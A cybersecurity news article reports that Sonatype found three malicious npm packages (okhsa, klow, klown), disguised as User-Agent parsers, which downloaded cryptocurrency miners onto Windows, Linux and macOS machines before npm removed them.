New NPM Malware Mines Cryptocurrency on Windows, Linux, macOS Devices

The automated malware detection system of Sonatype has recently discovered several malicious cryptocurrency mining software on Windows, Linux, macOS Devices. 

All these cryptocurrency mining software were disguised themselves as legitimate JavaScript libraries, and found in three JavaScript libraries that are uploaded to the official NPM repository.

Malicious Packages

There are three malicious packages, and here they are mentioned below:-

  • okhsa
  • klow
  • klown

All these above malicious packages were disguised as User-Agent header parsers and uploaded by the same author on October 15th. However, these three malicious packages were detected immediately and experts reported them to the NPM administration.

And as a result, the NPM administration promptly removed these malicious packages from the official NPM repository, but, before their removal, these packages were already downloaded more than 150 times.

According to the report, Among these three malicious packages, only the klow and klown contained a cryptocurrency miner and the malicious code that was used as dependencies in the okhsa package.

A .bat or .sh script was loaded onto the user’s system depending on the platform used by the user like Windows, Linux, macOS. Once the .bat or .sh script was loaded it starts downloading the EXE or Linux ELF files from an external host, which is later used to execute arguments that intents to the following things:-

  • Mining pool
  • Cryptocurrency wallet address
  • Number of processor threads to use

Here, in the background of an infected system, the malicious EXE runs quietly due to which the whole process remains hidden under the hood. But, it is still not clear that how the operators of these malicious packages target the developers.

Moreover, Sonatype has assured that they are constantly pursuing the following malware hiding in software repositories:-

  • Brandjacking
  • Typosquatting
  • Cryptomining

There are two malicious NPM packages were found in the NPM repository in July of this year 2021, and these two malicious packages were competent in stealing credentials from Google Chrome browsers on Windows systems, and not only that even for spyware activity also install backdoors.

Looking for Best WAF Solutions for your web applications environment?? Register for Free WAF webinar & explore the experts thoughts and Choose the Best one.. Very limited seats available.. grab it here at ProPhaze.

You can follow us on LinkedinTwitterFacebook for daily Cyber security and hacking news updates.

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

SSNDOB Marketplace Admin Jailed for Selling millions of Americans Data

In a resounding triumph for justice, U.S. District Judge Kathryn Kimball Mizelle has sentenced Vitalii…

12 hours ago

Is Your Online Store Hacked in a Carding Attack? Here’s an Action Plan to Protect

Hackers are plotting to benefit from the generosity of Halloween, Thanksgiving, and Christmas shoppers using…

15 hours ago

Google Researchers Find Out How ChatGPT Queries Can Collect Personal Data

The LLMs (Large Language Models) are evolving rapidly with continuous advancements in their research and…

15 hours ago

New Android Malware Employs Various Tactics to Deceive Malware Analyst

In the dynamic realm of mobile application security, cybercriminals employ ever more sophisticated forms of…

17 hours ago

DJvu Ransomware Mimic as Cracked Software to Compromise Computers

A recent campaign has been observed to be delivering DJvu ransomware through a loader that…

18 hours ago

Okta Hack: Threat Actors Downloaded all Customer Support System Users’ Data

In a pivotal update to the Okta security incident divulged in October 2023, Okta Security…

19 hours ago